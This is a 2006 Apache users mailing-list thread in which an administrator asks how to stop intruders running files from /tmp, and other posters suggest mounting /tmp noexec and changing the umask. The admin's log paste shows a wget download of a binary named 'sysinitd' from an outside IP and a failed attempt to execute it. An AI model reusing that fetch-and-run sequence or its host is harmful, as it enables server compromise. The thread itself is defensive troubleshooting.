You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Georgy Goshin <go...@inbox.ee> on 2006/06/02 10:44:31 UTC
[users@httpd] how to prevent an executing from /tmp
Hi!
Someone often uploads files to /tmp and then executing in on the server with
webserver user priveleges. How to prevent it?
Thanks,
G.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] how to prevent an executing from /tmp
Posted by Gaël Lams <la...@gmail.com>.
> Someone often uploads files to /tmp and then executing in on the server with
> webserver user priveleges. How to prevent it?
I personnaly always put /tmp on its own partition and mount it with
the noexec option.
Regards,
Gaël
Re: [users@httpd] how to prevent an executing from /tmp
Posted by Georgy Goshin <go...@inbox.ee>.
Immidiatley after restart someone donwloads to /tmp file sysinitrd, how do I
know wich virtualhost do this?
[Sat Jun 03 13:30:25 2006] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Sat Jun 03 13:30:25 2006] [notice] LDAP: SSL support unavailable
[Sat Jun 03 13:30:25 2006] [notice] suEXEC mechanism enabled (wrapper:
/usr/sbin/suexec)
[Sat Jun 03 13:30:26 2006] [notice] Digest: generating secret for digest
authentication ...
[Sat Jun 03 13:30:26 2006] [notice] Digest: done
[Sat Jun 03 13:30:26 2006] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Sat Jun 03 13:30:26 2006] [notice] LDAP: SSL support unavailable
[Sat Jun 03 13:30:26 2006] [notice] mod_python: Creating 32 session mutexes
based on 512 max processes and 0 max threads.
[Sat Jun 03 13:30:27 2006] [notice] Apache/2.0.51 (Fedora) mod_perl/1.99_12
Perl/v5.8.3 DAV/2 PHP/4.3.11 mod_python/3.1.3 Python/2.3.3 mod_ssl/2.0.51
OpenSSL/0.9.7a configu
red -- resuming normal operations
--13:30:39-- http://212.78.204.20/turbo3000/sysinitd
=> `sysinitd'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 343.06
KB/s
13:30:39 (343.06 KB/s) - `sysinitd' saved [31,973/31,973]
sh: line 1: ./sysinitd: Permission denied
--13:30:53-- http://212.78.204.20/turbo3000/sysinitd
=> `sysinitd.1'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 278.19
KB/s
13:30:53 (278.19 KB/s) - `sysinitd.1' saved [31,973/31,973]
sh: line 1: ./sysinitd: Permission denied
And I often find a processes with name '-bash' and uid 'apache' - how to
disallow this?
I remounted /tmp and /home with noexec,nosuid.
Thanks,
G.
----- Original Message -----
From: "JP" <jp...@tulane.edu>
To: <us...@httpd.apache.org>
Sent: Friday, June 02, 2006 5:23 PM
Subject: RE: [users@httpd] how to prevent an executing from /tmp
>>
>> Someone often uploads files to /tmp and then executing in on the server
>> with
>> webserver user priveleges. How to prevent it?
>>
>
> How about changing the umask of the webuser?
>
> JP
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
RE: [users@httpd] how to prevent an executing from /tmp
Posted by JP <jp...@tulane.edu>.
>
> Someone often uploads files to /tmp and then executing in on the server
> with
> webserver user priveleges. How to prevent it?
>
How about changing the umask of the webuser?
JP
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org